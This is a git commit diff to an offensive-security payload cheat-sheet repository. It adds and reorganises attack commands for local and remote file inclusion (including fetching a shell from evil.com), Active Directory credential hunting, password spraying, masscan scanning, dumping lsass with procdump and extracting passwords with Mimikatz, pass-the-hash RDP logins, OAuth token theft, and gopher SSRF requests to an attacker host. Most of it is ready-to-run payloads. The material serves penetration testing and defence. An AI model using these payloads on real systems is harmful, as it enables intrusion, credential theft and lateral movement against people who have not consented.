Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp

This commit is contained in:
Swissky 2019-05-12 21:34:09 +02:00
parent 765c615efe
commit bab04f8587
11 changed files with 144 additions and 49 deletions

View File

@ -7,6 +7,10 @@
## Summary
* [Basic LFI](#basic-lfi)
* [Null byte](#null-byte)
* [Double encoding](#double-encoding)
* [Path truncation](#path-truncation)
* [Filter bypass tricks](#filter-bypass-tricks)
* [Basic RFI](#basic-rfi)
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
* [Wrapper php://filter](#wrapper-phpfilter)
@ -31,27 +35,30 @@ In the following examples we include the `/etc/passwd` file, check the `Director
http://example.com/index.php?page=../../../etc/passwd
```
Null byte
### Null byte
```powershell
http://example.com/index.php?page=../../../etc/passwd%00
```
Double encoding
### Double encoding
```powershell
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
Path truncation
### Path truncation
On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
```powershell
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE]
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
```
Filter bypass tricks
### Filter bypass tricks
```powershell
http://example.com/index.php?page=....//....//etc/passwd
@ -65,13 +72,13 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C
http://example.com/index.php?page=http://evil.com/shell.txt
```
Null byte
### Null byte
```powershell
http://example.com/index.php?page=http://evil.com/shell.txt%00
```
Double encoding
### Double encoding
```powershell
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
@ -285,3 +292,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)

View File

@ -307,6 +307,8 @@ cme smb 10.10.0.202 -u username -p password --ntds vss
enum4linux | grep -i desc
There are 3-4 fields that seem to be common in most AD schemas:
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
```
### PassTheTicket Golden Tickets
@ -563,13 +565,21 @@ Alternatively you can use the Metasploit module
### Password spraying
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
```powershell
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
```
Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
```powershell
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
```
Most of the time the best passwords to spray are :
- Password1

View File

@ -8,6 +8,7 @@
* The Harvester
* [Active Recon](#active-recon)
* Masscan
* Nmap
* Nmap Script
* RPCClient
@ -47,6 +48,13 @@
## Active recon
* Masscan
```powershell
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
```
* Basic NMAP
```bash

View File

@ -1,38 +1,14 @@
# Network Discovery
## Netdiscover
## Summary
```powershell
netdiscover -i eth0 -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
```
## Responder
```powershell
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
responder.py -I eth0 -wrf
```
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
## Bettercap
```powershell
bettercap -X --proxy --proxy-https -T <target IP>
# better cap in spoofing, discovery, sniffer
# intercepting http and https requests,
# targetting specific IP only
```
- [Nmap](#nmap)
- [Masscan](#masscan)
- [Netdiscover](#netdiscover)
- [Responder](#responder)
- [Bettercap](#bettercap)
- [Reconnoitre](#reconnoitre)
- [References](#references)
## Nmap
@ -121,6 +97,13 @@ Host script results:
List Nmap scripts : ls /usr/share/nmap/scripts/
```
## Masscan
```powershell
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
```
## Reconnoitre
Dependencies:
@ -135,6 +118,40 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
If you have a segfault with nbtscan, read the following quote.
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
## Netdiscover
```powershell
netdiscover -i eth0 -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
```
## Responder
```powershell
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
responder.py -I eth0 -wrf
```
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
## Bettercap
```powershell
bettercap -X --proxy --proxy-https -T <target IP>
# better cap in spoofing, discovery, sniffer
# intercepting http and https requests,
# targetting specific IP only
```
## References
* [TODO](TODO)

View File

@ -234,13 +234,22 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
## Spawn TTY Shell
Access shortcuts, su, nano and autocomplete in a partially tty shell
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
```powershell
ctrl+z
echo $TERM && tput lines && tput cols
# for bash
stty raw -echo
fg
# for zsh
stty raw -echo; fg
reset
export SHELL=bash
export TERM=xterm-256color

View File

@ -26,6 +26,25 @@ mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
```
## Mimikatz - Mini Dump
Dump the lsass process.
```powershell
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
```
Then load it inside Mimikatz.
```powershell
mimikatz # sekurlsa::minidump lsass.dmp
Switch to minidump
mimikatz # sekurlsa::logonPasswords
```
## Mimikatz Golden ticket
```powershell

View File

@ -119,18 +119,20 @@ or with crackmapexec
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
```
For Server 2012 R2, Win8.1+
```powershell
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
```
with Metasploit
or with Metasploit
```powershell
run getgui -u admin -p 1234
```
Then log in using xfreerdp
```powershell
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
xfreerd /u:runner /v:10.0.0.1 # password will be asked
```
## Netuse (Windows)
```powershell

View File

@ -1,4 +1,20 @@
# OAuth 2 - Common vulnerabilities
# OAuth
## Summary
- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
- [OAuth private key disclosure](#oauth-private-key-disclosure)
- [Authorization Code Rule Violation](#authorization-code-rule-violation)
- [Cross-Site Request Forgery](#cross-site-request-forgery)
- [References](#references)
## Stealing OAuth Token via referer
From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet.
> Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer
## Grabbing OAuth Token via redirect_uri

View File

@ -2,7 +2,7 @@
A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques !
I <3 pull requests :)
I :heart: pull requests :)
You can also contribute with a beer IRL or with `buymeacoffee.com`

View File

@ -277,6 +277,13 @@ You didn't say the magic word !
QUIT
```
#### Gopher HTTP
```powershell
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
```
#### Gopher SMTP - Back connect to 1337
```php

View File

@ -930,7 +930,6 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
- [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager
- [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen
- [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton
- he is able to make stored XSS from a irrelevant domain to main facebook domain
- [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton
- [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes
- [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek